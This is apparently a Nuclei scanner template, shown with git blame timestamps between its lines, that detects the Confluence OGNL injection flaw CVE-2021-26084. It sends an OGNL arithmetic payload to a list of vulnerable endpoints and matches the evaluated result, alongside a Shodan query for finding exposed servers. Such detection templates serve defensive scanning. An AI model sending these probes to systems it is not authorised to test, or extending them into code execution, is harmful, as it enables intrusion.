2021-08-31 20:40:27 +00:00
id : CVE-2021-26084
info :
2022-05-18 20:58:07 +00:00
name : Confluence Server - Remote Code Execution
2021-09-02 17:35:07 +00:00
author : dhiyaneshDk,philippedelteil
2021-08-31 20:40:27 +00:00
severity : critical
2022-05-18 20:58:07 +00:00
description : Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options.
2021-08-31 20:40:27 +00:00
reference :
2021-09-01 18:34:06 +00:00
- https://jira.atlassian.com/browse/CONFSERVER-67940
2021-09-03 07:10:20 +00:00
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084
2021-08-31 20:40:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-26084
2021-09-03 07:10:20 +00:00
- https://github.com/Udyz/CVE-2021-26084
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-26084
cwe-id : CWE-74
2022-03-19 10:42:08 +00:00
metadata :
shodan-query : http.component:"Atlassian Confluence"
2022-07-21 17:18:22 +00:00
tags : cve,cve2021,rce,confluence,injection,ognl,kev
2021-08-31 20:40:27 +00:00
requests :
- raw :
- |
2021-09-03 07:10:20 +00:00
POST /{{path}} HTTP/1.1
2021-08-31 20:40:27 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2021-09-01 18:34:06 +00:00
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
2021-09-01 18:58:41 +00:00
2021-09-03 07:10:20 +00:00
payloads :
path :
- pages/createpage-entervariables.action?SpaceKey=x
2021-09-09 20:38:22 +00:00
- pages/createpage-entervariables.action
2021-09-03 07:10:20 +00:00
- confluence/pages/createpage-entervariables.action?SpaceKey=x
2021-09-09 20:38:22 +00:00
- confluence/pages/createpage-entervariables.action
2021-09-03 07:10:20 +00:00
- wiki/pages/createpage-entervariables.action?SpaceKey=x
2021-09-09 20:38:22 +00:00
- wiki/pages/createpage-entervariables.action
2021-09-03 07:10:20 +00:00
- pages/doenterpagevariables.action
- pages/createpage.action?spaceKey=myproj
- pages/templates2/viewpagetemplate.action
- pages/createpage-entervariables.action
- template/custom/content-editor
- templates/editor-preload-container
- users/user-dark-features
2021-09-02 17:35:07 +00:00
2021-09-03 07:10:20 +00:00
stop-at-first-match : true
2021-08-31 20:40:27 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : body
words :
2021-09-02 17:35:07 +00:00
- 'value="aaaa{140592=null}'
2022-05-18 20:58:07 +00:00
# Enhanced by mp on 2022/05/17